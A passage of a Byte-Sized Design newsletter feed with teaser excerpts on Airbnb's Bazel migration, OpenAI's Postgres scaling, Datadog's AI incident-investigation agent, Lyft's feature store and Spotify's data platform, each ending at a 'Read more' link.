   ]]></content:encoded></item><item><title><![CDATA[Knowing When to Stop Engineering: Airbnb’s Hardest Lesson]]></title><description><![CDATA[Tens of millions of lines of code. 700 services. 450 data pipelines. 4.5 years of migration. And the thing that could have cut the timeline in half was knowing when to stop engineering.]]></description><link>https://read.bytesizeddesign.com/p/airbnb-got-5x-faster-builds-3x-faster</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/airbnb-got-5x-faster-builds-3x-faster</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Sun, 01 Feb 2026 07:36:29 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/f726df75-963c-4fcf-bfbb-56345903a563_1120x629.webp" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>5x faster local builds. 3x faster IntelliJ syncs. 3x faster deploys to dev. Build satisfaction jumping from 38% to 68%.</p><p>Those are the numbers. They&#8217;re impressive. And it took Airbnb 4.5 years to get there.</p><p>With hindsight, they could have gotten there a lot sooner. Not by being smarter about Bazel. By being smarter about <em>when</em> to optimize.</p><p>Let&#8217;s get into it.</p><div><hr></div><h2>&#128680; Why Gradle Was Killing Them</h2><p>Gradle&#8217;s single-threaded configuration was a ticking clock. Large projects took minutes just to <em>configure</em> before a single line of code compiled. On CI, they were already vertically scaling to the biggest machines AWS offered. The sharding heuristics they built to split work across machines were leaking efficiency everywhere, machines sat half-idle while shared tasks duplicated across nodes.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!_xQ_!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F558e3507-5eec-489b-8d2f-3f359cea62f9_1120x598.webp" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!_xQ_!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F558e3507-5eec-489b-8d2f-3f359cea62f9_1120x598.webp 424w, https://substackcdn.com/image/fetch/$s_!_xQ_!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F558e3507-5eec-489b-8d2f-3f359cea62f9_1120x598.webp 848w, https://substackcdn.com/image/fetch/$s_!_xQ_!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F558e3507-5eec-489b-8d2f-3f359cea62f9_1120x598.webp 1272w, https://substackcdn.com/image/fetch/$s_!_xQ_!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F558e3507-5eec-489b-8d2f-3f359cea62f9_1120x598.webp 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!_xQ_!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F558e3507-5eec-489b-8d2f-3f359cea62f9_1120x598.webp" width="1120" height="598" 
data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/558e3507-5eec-489b-8d2f-3f359cea62f9_1120x598.webp&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:598,&quot;width&quot;:1120,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:56936,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/webp&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://bytesizeddesign.substack.com/i/186479620?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F558e3507-5eec-489b-8d2f-3f359cea62f9_1120x598.webp&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!_xQ_!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F558e3507-5eec-489b-8d2f-3f359cea62f9_1120x598.webp 424w, https://substackcdn.com/image/fetch/$s_!_xQ_!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F558e3507-5eec-489b-8d2f-3f359cea62f9_1120x598.webp 848w, https://substackcdn.com/image/fetch/$s_!_xQ_!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F558e3507-5eec-489b-8d2f-3f359cea62f9_1120x598.webp 1272w, https://substackcdn.com/image/fetch/$s_!_xQ_!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F558e3507-5eec-489b-8d2f-3f359cea62f9_1120x598.webp 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>But speed was only half the problem.</p><p>Gradle tasks had full access to the file system. Sounds fine until one engineer writes a cleanup task that wipes recent files in <code>/tmp/</code>. That task races with every other Gradle task using <code>/tmp/</code>. CI starts failing at scale. Thousands of tasks have to rerun. 
Nobody catches it until it&#8217;s already in production.</p><p>This was not a one-off. It was structural. Gradle gave tasks too much trust, and at the scale of tens of millions of lines of code, trust becomes a liability.</p><div><hr></div><h2>&#128269; What Bazel Actually Fixed</h2><p><strong>Sandboxing killed the ghost dependencies.</strong> If a file isn&#8217;t declared as an input to a build action, it doesn&#8217;t exist. Period. That <code>/tmp/</code> race condition? Can&#8217;t happen. Undeclared dependencies that work on your laptop but fail in CI? Gone.</p><p><strong>Remote execution changed the math entirely.</strong> Instead of sharding builds across a handful of machines with heuristics, Bazel fanned out to thousands of parallel actions. RBE workers are short-lived &#8212; spin up, do work, die. No machine sits idle. No duplicated shared tasks. And Build without the Bytes meant only downloading the subset of outputs you actually need, not every cached artifact.</p><p><strong>Starlark forced discipline.</strong> Bazel&#8217;s configuration language is constrained to be side-effect-free. That&#8217;s not a limitation, it&#8217;s what makes parallel analysis possible. Gradle&#8217;s configuration phase was single-threaded because it <em>couldn&#8217;t</em> be parallelized. Starlark&#8217;s constraints made it safe to be.</p><p>The results landed hard: 3&#8211;5x faster local builds, build satisfaction scores jumping from 38% to 68%, and CI times that actually made developers feel productive again.</p><div><hr></div><h2>&#127959;&#65039; How They Actually Did It (The Parts That Matter)</h2>
      <p>
          <a href="https://read.bytesizeddesign.com/p/airbnb-got-5x-faster-builds-3x-faster">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[What OpenAI Understood About Postgres That Most Teams Ignore]]></title><description><![CDATA[How One Postgres Instance Powers 800 Million ChatGPT Users]]></description><link>https://read.bytesizeddesign.com/p/how-openai-scaled-postgresql-to-power</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/how-openai-scaled-postgresql-to-power</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Sat, 24 Jan 2026 18:57:33 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/5807a0ea-a788-40f2-901a-15126a5cb6e3_960x560.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Every infrastructure architect on the planet will tell you the same thing: single-primary Postgres dies around 10 million users. Maybe 20 million if you&#8217;re really good.</p><p>OpenAI is at 800 million.</p><p>One primary database. 50 read replicas. Millions of queries per second.</p><p>And it just keeps working.</p><div><hr></div><h2>They Broke Every Rule We Have About Database Scaling</h2><p>When ChatGPT launched and traffic went vertical, the playbook said: start sharding, migrate to Cassandra, or pray.</p><p>OpenAI looked at that playbook and said &#8220;nah.&#8221;</p><p>Here&#8217;s what they noticed: 95% of their traffic is reads. Updates happen, sure. But the overwhelming majority of requests are just fetching data.</p><p>Everyone panics about Postgres not scaling. But that&#8217;s mostly about writes. Nobody&#8217;s really pushed the boundaries on reads with a single writer.</p><p>Turns out you can go way, way further than anyone thought.</p><p>One Azure Postgres instance handling all writes. Nearly 50 replicas spread across regions handling reads. Double-digit millisecond p99 latency. Five nines uptime.</p><p>In the last 12 months? One SEV-0 incident. And that was during the ImageGen launch when 100 million people signed up in a week and writes spiked 10x overnight.</p><div><hr></div><h2>Write Traffic Is Where Postgres Falls Apart</h2><p>Postgres uses something called MVCC. When you update a row, it doesn&#8217;t change it in place. 
It creates a whole new version and marks the old one as dead.</p><div class="captioned-image-container"><figure><a class="image-link" target="_blank" href="https://substackcdn.com/image/fetch/$s_!TFRg!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7937441e-f09b-4cc9-ae3a-66ebb4417d65_1578x978.png"><img src="https://substackcdn.com/image/fetch/$s_!TFRg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7937441e-f09b-4cc9-ae3a-66ebb4417d65_1578x978.png" width="1456" height="902" alt="" loading="lazy"></a></figure></div><p>Update a user&#8217;s email? New row version. Update it again? Another new version.</p><p>All those dead versions sit there until autovacuum cleans them up. And under heavy write load:</p><ul><li><p>Every update copies the entire row (write amplification)</p></li><li><p>Reads have to scan past dead versions to find the current one (read amplification)</p></li><li><p>Tables bloat</p></li><li><p>Indexes bloat</p></li><li><p>Autovacuum can&#8217;t keep up</p></li></ul><p>This is why people say Postgres doesn&#8217;t scale. They&#8217;re hammering it with writes and hitting a ceiling.</p><p>OpenAI just stopped fighting that fight.</p><div><hr></div><h2>What They Did Instead</h2>
      <p>
          <a href="https://read.bytesizeddesign.com/p/how-openai-scaled-postgresql-to-power">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[How Datadog taught an AI to investigate high-severity incidents]]></title><description><![CDATA[How Datadog built an AI SRE agent that investigates high-severity production incidents by forming hypotheses, following causal signals, and reasoning like experienced engineers&#8212;not by summarizing dashboards.]]></description><link>https://read.bytesizeddesign.com/p/how-datadog-taught-an-ai-to-investigate</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/how-datadog-taught-an-ai-to-investigate</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Tue, 20 Jan 2026 07:56:46 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/0a36b9d4-24dc-4578-9ca1-17d20657d7a6_2400x1025.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Most incident tools are good at <strong>collecting evidence</strong>.</p><p>They&#8217;re bad at <strong>thinking with it</strong>.</p><p>If you&#8217;ve ever been on call, you know the feeling:</p><ul><li><p>12 dashboards open</p></li><li><p>Logs screaming</p></li><li><p>Traces half-useful</p></li><li><p>And one suspicious metric you <em>can&#8217;t ignore</em></p></li></ul><p>The hard part isn&#8217;t access to data.<br>It&#8217;s deciding <strong>what to look at next</strong>.</p><p>That&#8217;s the problem Bits AI SRE is actually trying to solve.</p><div><hr></div><h2>This isn&#8217;t an AI summarizer (and that matters)</h2><p>The early wave of &#8220;AI for ops&#8221; tools made a quiet assumption:</p><blockquote><p><em>If we gather enough telemetry, the model can summarize its way to the root cause.</em></p></blockquote><p>That turns out to be wrong.</p><p>More data doesn&#8217;t make incidents clearer.<br>It makes them <strong>noisier</strong>.</p><p>Bits AI SRE does something different.<br>It investigates like a <strong>team of human SREs</strong>:</p><ul><li><p>Form a hypothesis</p></li><li><p>Pull <em>targeted</em> evidence</p></li><li><p>Validate or reject</p></li><li><p>Go deeper only when the signal earns it</p></li></ul><p>That sounds obvious.<br>It isn&#8217;t.</p><p>Most tools still dump everything into context and hope the model figures it out.</p><div><hr></div><h2>The key shift: causality over correlation</h2><p>Here&#8217;s the most important design decision in this system:</p><p><strong>The agent only looks at data that is causally related to a hypothesis.</strong></p><p>Not &#8220;everything nearby.&#8221;<br>Not &#8220;everything noisy.&#8221;<br>Not &#8220;everything interesting.&#8221;</p><p>Just:</p><blockquote><p><em>Does this explain why the alert fired?</em></p></blockquote><p>In one real incident:</p><ul><li><p>Kafka lag spiked</p></li><li><p>Commit latency spiked</p></li><li><p>Unrelated upstream errors were present</p></li></ul><p>Earlier versions of the agent saw <em>all of it</em><br>&#8230;and picked the wrong root cause.</p><p>The newer version ignored the noise and followed the causal chain:<br><strong>commit latency &#8594; consumer lag &#8594; alert</strong></p><p>That&#8217;s not an LLM trick.<br>That&#8217;s <strong>system design discipline</strong>.</p><div><hr></div><h2>Why benchmarking on real incidents is the quiet superpower</h2>
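<p>The investigation loop described above is worth sketching, because the discipline lives in the control flow rather than in the model. The sketch below is ours, not Datadog&#8217;s code; <code>form_hypotheses</code>, <code>fetch_evidence</code>, and <code>supports</code> are hypothetical stand-ins for whatever generates hypotheses, pulls targeted telemetry, and scores it against a hypothesis.</p><pre><code># A minimal sketch of a hypothesis-driven investigation loop. Not Datadog's
# code; form_hypotheses, fetch_evidence and supports are hypothetical hooks.
from collections import deque

def investigate(alert, form_hypotheses, fetch_evidence, supports):
    """Follow the causal chain behind an alert, one hypothesis at a time."""
    queue = deque(form_hypotheses(alert))      # e.g. "commit latency caused consumer lag"
    findings = []
    while queue:
        hypothesis = queue.popleft()
        evidence = fetch_evidence(hypothesis)  # targeted pull, not "everything nearby"
        if not supports(evidence, hypothesis):
            continue                           # reject and move on; don't widen the search
        findings.append((hypothesis, evidence))
        queue.extend(form_hypotheses(hypothesis))  # go deeper only when the signal earns it
    return findings
</code></pre>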
      <p>
          <a href="https://read.bytesizeddesign.com/p/how-datadog-taught-an-ai-to-investigate">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[Processing Trillions: How Lyft's Feature Store Grew by 12%, 33% Faster, With Zero Custom DSLs]]></title><description><![CDATA[Lyft's Feature Store handles 1T+ operations daily, cut P95 latency 33%, and grew callers 25% YoY. How they built ML infrastructure engineers actually use.]]></description><link>https://read.bytesizeddesign.com/p/processing-trillions-how-lyfts-feature</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/processing-trillions-how-lyfts-feature</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Mon, 12 Jan 2026 00:24:26 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/5b0ab863-338c-4ad2-80bc-4c826a0a47af_1050x700.avif" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>TL;DR</h2><p>Lyft&#8217;s Feature Store serves 60+ production use cases and grew caller count by 25% last year. They cut P95 latency by a third while handling over a trillion additional R/W operations. The secret wasn&#8217;t fancy tech&#8212;it was treating ML infrastructure like a product with actual users who have better things to do than learn your system.</p><div><hr></div><h2>&#127919; The Problem Nobody Talks About</h2><p>Here&#8217;s what kills most ML platforms: the feature engineering tax.</p><p>Data scientists write a killer model. It works great in notebooks. Then they need to:</p><ul><li><p>Rewrite feature logic for production (different language, different compute)</p></li><li><p>Debug why training features don&#8217;t match serving features</p></li><li><p>Wait 3 sprints for platform team to provision infrastructure</p></li><li><p>Maintain two separate codebases that drift apart</p></li></ul><p>Six months later, the model&#8217;s still not deployed and everyone&#8217;s moved on to the next fire.</p><p>Lyft decided this was unacceptable. 
When you&#8217;re running a marketplace where every ML improvement directly impacts revenue, you can&#8217;t have your ML engineers stuck in infrastructure hell.</p><div><hr></div><h2>&#127959;&#65039; Architecture That Doesn&#8217;t Get In The Way</h2><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!l6C-!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55bd77ed-b0d0-43d0-8e85-91062eb883a4_1942x1462.webp" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!l6C-!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55bd77ed-b0d0-43d0-8e85-91062eb883a4_1942x1462.webp 424w, https://substackcdn.com/image/fetch/$s_!l6C-!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55bd77ed-b0d0-43d0-8e85-91062eb883a4_1942x1462.webp 848w, https://substackcdn.com/image/fetch/$s_!l6C-!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55bd77ed-b0d0-43d0-8e85-91062eb883a4_1942x1462.webp 1272w, https://substackcdn.com/image/fetch/$s_!l6C-!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55bd77ed-b0d0-43d0-8e85-91062eb883a4_1942x1462.webp 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!l6C-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55bd77ed-b0d0-43d0-8e85-91062eb883a4_1942x1462.webp" width="1456" height="1096" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/55bd77ed-b0d0-43d0-8e85-91062eb883a4_1942x1462.webp&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1096,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:96922,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/webp&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://bytesizeddesign.substack.com/i/184264464?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55bd77ed-b0d0-43d0-8e85-91062eb883a4_1942x1462.webp&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!l6C-!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55bd77ed-b0d0-43d0-8e85-91062eb883a4_1942x1462.webp 424w, https://substackcdn.com/image/fetch/$s_!l6C-!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55bd77ed-b0d0-43d0-8e85-91062eb883a4_1942x1462.webp 848w, https://substackcdn.com/image/fetch/$s_!l6C-!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55bd77ed-b0d0-43d0-8e85-91062eb883a4_1942x1462.webp 1272w, 
https://substackcdn.com/image/fetch/$s_!l6C-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55bd77ed-b0d0-43d0-8e85-91062eb883a4_1942x1462.webp 1456w" sizes="100vw" loading="lazy"></picture></div></a></figure></div><h3>The Three Feature Families</h3><p>Lyft split their world into batch, streaming, and online. Not revolutionary, but the execution matters.</p><p><strong>Batch features</strong> (the workhorse):</p><ul><li><p>Customer writes SparkSQL query + simple JSON config</p></li><li><p>Python cron generates production Airflow DAG automatically</p></li><li><p>DAG handles compute, storage, quality checks, discovery&#8212;everything</p></li><li><p>Data lands in both Hive (offline training) and DynamoDB (online serving)</p></li></ul><p><strong>Streaming features</strong> (the real-time stuff):</p><ul><li><p>Flink apps read from Kafka/Kinesis</p></li><li><p>Transform data, add metadata</p></li><li><p>Sink to <code>spfeaturesingest</code> service</p></li><li><p>Service handles serialization and writes to online store</p></li></ul><p><strong>Online serving</strong> (<code>dsfeatures</code>):</p><ul><li><p>DynamoDB as source of truth</p></li><li><p>ValKey (Redis fork) write-through cache on top</p></li><li><p>OpenSearch for embeddings</p></li><li><p>Go and Python SDKs expose full CRUD</p></li></ul><p>The smart part? Whether you write features via batch DAG, streaming app, or direct API call, they all land in the same online store with identical metadata. No &#8220;training/serving skew&#8221; headaches.</p><h3>The Part That Actually Matters</h3><p>Most feature stores fail because they&#8217;re too clever. Lyft succeeded because they made everything stupidly simple:</p><p><strong>For feature creation:</strong><br>SparkSQL query + JSON config. That&#8217;s it.</p><p>json</p><pre><code><code>{
  "owner": "pricing-team",
  "urgency": "high",
  "refresh_cadence": "daily",
  "features": {...}
}</code></code></pre><p>sql</p><pre><code><code>SELECT 
  user_id,
  avg(ride_cost) as avg_ride_cost_30d
FROM rides
WHERE dt &gt;= date_sub(current_date, 30)
GROUP BY user_id</code></code></pre><p>No YAML hell. No custom DSLs. Just SQL and basic metadata.</p><p><strong>For feature retrieval:</strong><br>SDK method calls. <code>Get()</code> or <code>BatchGet()</code>. Returns data in whatever format your service speaks.</p><p>They optimized for the 90% use case: SQL-proficient engineers who want to ship fast and move on.</p><div><hr></div><h2>&#128161; What They Got Right</h2>
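<p>For a feel of the retrieval side described above: Lyft&#8217;s write-up doesn&#8217;t publish the SDK surface, so the names below are hypothetical, not their actual Go or Python SDK. The point is only the shape of the call site: look up features by entity key, get values back, no SQL at read time.</p><pre><code># Hypothetical call-site sketch; FeatureClient, get and batch_get are
# illustrative names, not Lyft's actual SDK.
from dataclasses import dataclass, field

@dataclass
class FeatureClient:
    # Stand-in for the DynamoDB-plus-ValKey serving path.
    store: dict = field(default_factory=dict)

    def get(self, entity_id, feature):
        return self.store.get((entity_id, feature))

    def batch_get(self, entity_ids, feature):
        return {e: self.store.get((e, feature)) for e in entity_ids}

client = FeatureClient(store={("user_42", "avg_ride_cost_30d"): 23.70})
print(client.get("user_42", "avg_ride_cost_30d"))
print(client.batch_get(["user_42", "user_99"], "avg_ride_cost_30d"))
</code></pre>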
      <p>
          <a href="https://read.bytesizeddesign.com/p/processing-trillions-how-lyfts-feature">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[The Trillion-Event Platform: How Spotify Built a Data System That Doesn't Break]]></title><description><![CDATA[TL;DR Spotify processes 1.4 trillion data points daily.]]></description><link>https://read.bytesizeddesign.com/p/the-trillion-event-platform-how-spotify</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/the-trillion-event-platform-how-spotify</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Sat, 27 Dec 2025 04:59:18 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!D7y2!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd98697da-edbd-4c2f-a3d8-d40c1807eb2a_788x309.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>TL;DR</strong></p><p>Spotify processes 1.4 trillion data points daily. Spotify grew from managing Europe&#8217;s largest Hadoop cluster to a 100+ engineer team running a full GCP-based platform. The key was when they stopped treating the data platform like infrastructure and started treating it like a product with real customers.</p><div><hr></div><h2>&#127919; The Problem Space</h2><p>Most companies hit the &#8220;we need a data platform&#8221; moment when their Slack is flooded with:</p><ul><li><p>&#8220;Where&#8217;s that dataset again?&#8221;</p></li><li><p>&#8220;Why did this pipeline fail overnight?&#8221;</p></li><li><p>&#8220;Can someone explain why our numbers don&#8217;t match?&#8221;</p></li></ul><p>Spotify hit all these triggers, but they also had a unique constraint: when your product <em>is</em> personalization, data isn&#8217;t a nice-to-have. It&#8217;s the entire business.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!D7y2!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd98697da-edbd-4c2f-a3d8-d40c1807eb2a_788x309.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!D7y2!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd98697da-edbd-4c2f-a3d8-d40c1807eb2a_788x309.png 424w, https://substackcdn.com/image/fetch/$s_!D7y2!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd98697da-edbd-4c2f-a3d8-d40c1807eb2a_788x309.png 848w, https://substackcdn.com/image/fetch/$s_!D7y2!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd98697da-edbd-4c2f-a3d8-d40c1807eb2a_788x309.png 1272w, https://substackcdn.com/image/fetch/$s_!D7y2!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd98697da-edbd-4c2f-a3d8-d40c1807eb2a_788x309.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!D7y2!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd98697da-edbd-4c2f-a3d8-d40c1807eb2a_788x309.png" width="788" height="309" 
data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d98697da-edbd-4c2f-a3d8-d40c1807eb2a_788x309.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:309,&quot;width&quot;:788,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:51616,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://bytesizeddesign.substack.com/i/182678152?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd98697da-edbd-4c2f-a3d8-d40c1807eb2a_788x309.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!D7y2!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd98697da-edbd-4c2f-a3d8-d40c1807eb2a_788x309.png 424w, https://substackcdn.com/image/fetch/$s_!D7y2!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd98697da-edbd-4c2f-a3d8-d40c1807eb2a_788x309.png 848w, https://substackcdn.com/image/fetch/$s_!D7y2!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd98697da-edbd-4c2f-a3d8-d40c1807eb2a_788x309.png 1272w, https://substackcdn.com/image/fetch/$s_!D7y2!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd98697da-edbd-4c2f-a3d8-d40c1807eb2a_788x309.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset 